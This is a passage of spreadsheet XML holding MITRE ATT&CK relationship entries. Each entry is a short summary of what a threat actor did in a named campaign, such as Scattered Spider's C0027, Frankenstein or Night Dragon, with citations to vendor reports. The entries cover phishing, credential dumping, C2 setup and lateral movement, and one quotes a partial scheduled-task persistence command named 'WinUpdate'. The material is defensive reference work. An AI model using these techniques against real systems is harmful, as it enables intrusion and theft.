    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed Azure AD to download bulk lists of group members and their Active Directory attributes.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--11f6bf91-2330-4490-831d-3c84982a2280</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--603bfd74-0585-40f7-ba65-1a72d87f0775</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used access to the victim's Azure tenant to create Azure VMs.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--593d77c0-bcd3-4331-a75b-66cfa103e31d</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) sent phishing messages via SMS to steal credentials.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--e0d494d7-f081-4195-92c6-95aae2f2cadc</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) performed domain replication.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--1a080d89-1319-4b5d-8e62-d185172559da</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</si>
  <si>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</si>
  <si>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relationship--db315985-f1c1-4d7f-a154-c65351602680</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) registered devices for MFA to maintain persistence through victims' VPN.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--a7392d5f-d653-4b74-bf08-d95beb5fabcc</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed Azure AD to identify email addresses.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--8a03f60e-bb09-4f4d-815e-88d86192042f</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) exploited CVE-2021-35464 in the ForgeRock Open Access Management (OpenAM) application server to gain initial access.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--04e866d0-5d9d-435d-b37c-311bb0bbdb1e</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used Citrix and VPNs to persist in compromised environments.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--bbb92214-8772-4e46-916b-2d9c0cdec83e</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</si>
  <si>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</si>
  <si>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relationship--ad4bc41d-9079-4885-b986-1d558990fb46</t>
  </si>
  <si>
    <t>20 September 2023</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) downloaded tools using victim organization systems.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--2f785f1f-04f8-42f0-8082-a03fed3c3a94</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</si>
  <si>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</si>
  <si>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relationship--952ee3df-24da-4537-9e36-583e8f178f50</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), used RustScan to scan for open ports on targeted ESXi appliances.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--5dd2c2dd-dcc3-44f5-9c9a-3055cda6c5fa</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used SSH tunneling in targeted environments.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--002e561a-5500-4293-a876-01e8205a67c8</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) installed the open-source rsocx reverse proxy tool on a targeted ESXi appliance.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--f38960c1-2f2a-42d4-96f0-661d91062af3</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) directed victims to run remote monitoring and management (RMM) tools.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--aa308c15-3c8d-4df7-a6b2-0a4f61ef8d03</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</si>
  <si>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</si>
  <si>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relationship--7b2f6151-c019-4910-91a7-9dd6744c4ffb</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) sent Telegram messages impersonating IT personnel to harvest credentials.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--91df24f7-6089-4f42-a63e-6ecaa5d4af8e</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used phone calls to instruct victims to navigate to credential-harvesting websites.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--1769fb21-c686-4af1-ba8f-8bfa48ecf585</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</si>
  <si>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</si>
  <si>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relationship--f417c73d-20a3-447c-8839-5897e01d2a90</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</si>
  <si>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</si>
  <si>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relationship--dbcd9d76-b527-472f-8d3f-944cee432479</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) downloaded tools from sites including file.io, GitHub, and paste.ee.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--08f2da07-4e03-46bd-a3d9-c79ef7dd9a45</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used Windows Management Instrumentation (WMI) to move laterally via [Impacket](https://attack.mitre.org/software/S0357).(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--ab4d5c44-b402-4b17-8c23-719e74076dce</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors collected data and files from compromised networks.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--c3c9a7e7-4dbb-487e-b546-7bec3f929b3b</t>
  </si>
  <si>
    <t>For [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors established domains, some of which appeared to spoof legitimate domains.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--9de77d26-6424-4ee8-bd7d-1ae705020c55</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--8f354951-cd88-4193-b3d5-b95038938c7f</t>
  </si>
  <si>
    <t>12 October 2022</t>
  </si>
  <si>
    <t>During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors downloaded malware and tools onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--16cdc452-d4dc-43f7-be53-dc6b62135d20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</si>
  <si>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</si>
  <si>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relationship--b865d0be-c46c-4677-b66e-fe19e1fa9f31</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used a layer of proxies to manage C2 communications.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--2b6b93eb-6664-4a70-82a9-e56a416b9e61</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors employed nmap and pscan to scan target environments.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--069bd80b-9f39-46c6-a9dc-b61e42a2f91e</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--dfd947d6-60c1-4cb1-90ff-0111ccaddd1a</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used scheduled tasks to download backdoor tools.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--7d18e839-3e68-4168-8245-4278c6f0dc01</t>
  </si>
  <si>
    <t xml:space="preserve">During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors obtained open source tools to use in their operations.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--83b4190b-31aa-4f90-a397-624b89fb2f6f</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to automatically gather the username, domain name, machine name, and other system information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--ab431fe4-eb1b-48ed-a105-7d50b8d0beda</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which was automatically sent back to the adversary's C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--2caa19fb-fe02-4365-b53a-1ff554a13889</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran encoded commands from the command line.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--29883758-034d-4811-9145-9e12652edf66</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to gather various local system information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--bb7c9ed8-1733-4c81-8952-2196935571ef</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--d87615c7-501a-4b78-87fb-ba2c1a2faffb</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--cbc251b7-5541-408f-b11d-c57d600fc8cf</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--7dd876da-7f2b-4bdb-9cc1-424dd53dd6cd</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors downloaded files and tools onto a victim machine.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--4c39d715-d631-41fc-b015-0df20d0507d5</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used MSbuild to execute an actor-created file.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--e875898e-fa8e-41f9-90da-79cdfb748dba</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--42f078b7-f1ad-4507-9774-a4673a4c4acd</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors named a malicious scheduled task "WinUpdate" for persistence.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--b84a9cf4-976d-452d-8de0-76e318078a5c</t>
  </si>
  <si>
    <t>20 September 2022</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--4dea60e2-5339-4aed-b9a8-5ebf6af2f431</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain a list of all running processes.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--08052557-0aa5-49d0-9254-722e4f04804f</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors established persistence through a scheduled task using the command: `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`, named "WinUpdate" (Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--3cfb23f1-ae6c-4ba9-acf0-b5e592ea5597</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to determine if analysis tools were running on a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--5449b7c0-73f8-474f-8444-0182112d7c57</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--45f64e39-c3f8-4665-8433-af9503852e53</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--fa426e9e-7e77-4c1b-b03c-00a4ae45ac6c</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</si>
  <si>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</si>
  <si>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relationship--92cf3ea9-3499-4e12-b885-fcb43e0107ff</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain the compromised machine's name.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--191aac5f-38bc-429b-8343-32eb17fa4919</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to find the public IP address of a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--d84d46d9-658e-4a88-a3f3-616ce6c47535</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to enumerate hosts and gather username, machine name, and administrative permissions information.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--f3faf032-132b-421b-adea-2e95f214807f</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--7457d1f4-9829-4f60-a12e-e6b9952b55f1</t>
  </si>
  <si>
    <t>For [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors obtained and used [Empire](https://attack.mitre.org/software/S0363).(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--e5757ac1-2887-4492-9f9e-3c5e2c9994ff</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--59de6826-2503-422d-9e53-b3c0a43738dd</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used HTTP GET requests for C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--65325613-a4c1-4cd5-9e3c-ef48146891b3</t>
  </si>
  <si>
    <t>19 September 2022</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors ran a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command-line (Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--88b934e6-7620-49dd-a5a4-ce92c5d42b30</t>
  </si>
  <si>
    <t>During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--9ef2a5a7-3be8-426a-8411-ca78e35cef3a</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used 7zr.exe to add collected files to an archive.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--82c1c2da-e9c3-4e75-b563-22f4c1988035</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors registered a variety of domains.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--c274d8fa-8de4-4108-9d6f-9229edf752af</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--d992890d-5725-4bed-8d33-51dfbff77087</t>
  </si>
  <si>
    <t xml:space="preserve">During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors downloaded additional droppers and backdoors onto a compromised system.(Citation: Bitdefender FunnyDream Campaign November 2020) </t>
  </si>
  <si>
    <t>relationship--9752991d-85cf-4bd6-b778-8e884540d8ab</t>
  </si>
  <si>
    <t>11 October 2022</t>
  </si>
  <si>
    <t xml:space="preserve">For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a new backdoor named [FunnyDream](https://attack.mitre.org/software/S1044).(Citation: Bitdefender FunnyDream Campaign November 2020) </t>
  </si>
  <si>
    <t>relationship--9b55c1b3-94fd-436f-8910-9d0519d3b5b4</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Tasklist](https://attack.mitre.org/software/S0057) on targeted systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--9bfcb6e6-6e49-4b58-b09b-8502d27a93ec</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used several tools and batch files to map victims' internal networks.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--3d4cb0b5-148f-4e3f-a09f-7a17823b2b56</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Systeminfo](https://attack.mitre.org/software/S0096) to collect information on targeted hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fdd492a3-197b-4663-95c6-25d972dd7088</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [ipconfig](https://attack.mitre.org/software/S0100) for discovery on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--7b553858-ffee-4817-9033-b9ea06f71d43</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [netstat](https://attack.mitre.org/software/S0104) to discover network connections on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--c56990a5-9ef4-47a8-9c2b-4e313b9f363c</t>
  </si>
  <si>
    <t>For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a modified version of the open source [PcShare](https://attack.mitre.org/software/S1050) remote administration tool.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--ec8858d9-0379-4995-8873-76c8f2a2c07d</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a Visual Basic script to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--2d0de5c1-ff34-44b5-ba47-b3841eb1b8f3</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `cmd.exe` to execute the wmiexec.vbs script.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--86fb99ad-9fbc-4c57-8425-4dc90274a24d</t>
  </si>
  <si>
    <t>During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `wmiexec.vbs` to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--e5462f64-0583-4228-bc85-c3650a4dcfbb</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), the threat actors collected files and other data from compromised systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--3173f84e-783b-43cd-95f7-b74277936b4d</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</si>
  <si>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</si>
  <si>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relationship--fab721f4-26c2-4aac-9bb4-853864534c55</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used domain accounts to gain further access to victim systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--09c0322c-a714-4768-9d30-04160d2d7b2a</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used dynamic DNS services for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--ebe49c13-057f-4dc4-b04b-f19ac2480c4a</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used SQL injection exploits against extranet web servers to gain access.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--3c695c3d-7f8e-43dd-baad-b2afdfc86fc2</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used compromised VPN accounts to gain access to victim systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--21fdb8cc-baed-4b9a-871e-f74dc0f0f2d9</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used company extranet servers as secondary C2 servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--9b4a4f3b-d8f4-47d2-8e63-2687c566806b</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and browse the victim file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--b0a6695b-e5ab-47b3-adfd-4db09c41457e</t>
  </si>
  <si>
    <t>06 October 2022</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used administrative utilities to deliver Trojan components to remote systems.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--ee93f001-962f-41f5-8f17-98243608aad6</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used RAT malware to exfiltrate email archives.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--90839ffa-293e-4fe3-98d2-e8edfd55be2c</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors enticed users to click on links in spearphishing emails to download malware.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--1fdcaa51-4445-43be-99eb-52787756fa1c</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Trojans from underground hacker websites.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--113fbb20-8dd7-4ba6-b5a8-486e46d9abeb</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and manipulate the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--66a7d5ae-7975-448d-ae40-b0786a3a8cd6</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used a DLL that included an XOR-encoded section.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--41c20ce1-3b9d-4293-a203-a4196d307c59</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--c4cd588d-264a-468d-a472-8667b363d819</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Cain &amp; Abel to crack password hashes.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--d6b2febc-64a1-48cd-88f1-67295650d9cb</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used several remote administration tools as persistent infiltration channels.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--d39f49f7-3e63-4625-b6e9-e3fdbd0ae013</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors copied files to company web servers and subsequently downloaded them.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--fa0e5b1c-2434-4aff-ab0c-25efb7ba1b49</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors dumped account hashes using [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--791d8691-7e06-4052-8c49-1a9f57ccf09d</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors purchased hosted services to use for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--b4ae0cf8-ad1f-4813-9e07-fc3faba1454e</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors compromised web servers to use for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--dd49448e-10e3-4138-916b-1f3ba0727104</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used software packing in its tools.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--3be6aadd-ea5f-4910-a8a0-d1019977dc43</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--1e3438f9-573c-4912-81e7-650094af62ac</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--5014ae85-9335-40df-b03b-bc08964d4ff7</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors obtained and used tools such as [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--644bfb9b-0555-45e9-a967-c6bedcc05e88</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors uploaded commonly available hacker tools to compromised web servers.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--0a49a3af-973d-43ea-b4d4-8cc21c12dfc0</t>
  </si>
  <si>
    <t>relationship--3e1585d9-d6dc-4016-8cba-53ca08b7887e</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used HTTP for C2.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--7ac258e9-acfa-4bc4-a676-201cf40be956</t>
  </si>
  <si>
    <t>During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and run command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>relationship--3a693ff6-1969-443b-8eb4-bb2ad56f0dba</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the Makecab utility to compress and a version of WinRAR to create password-protected archives of stolen data prior to exfiltration.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--12ee5148-c274-4c94-a0da-69316cb329d2</t>
  </si>
  <si>
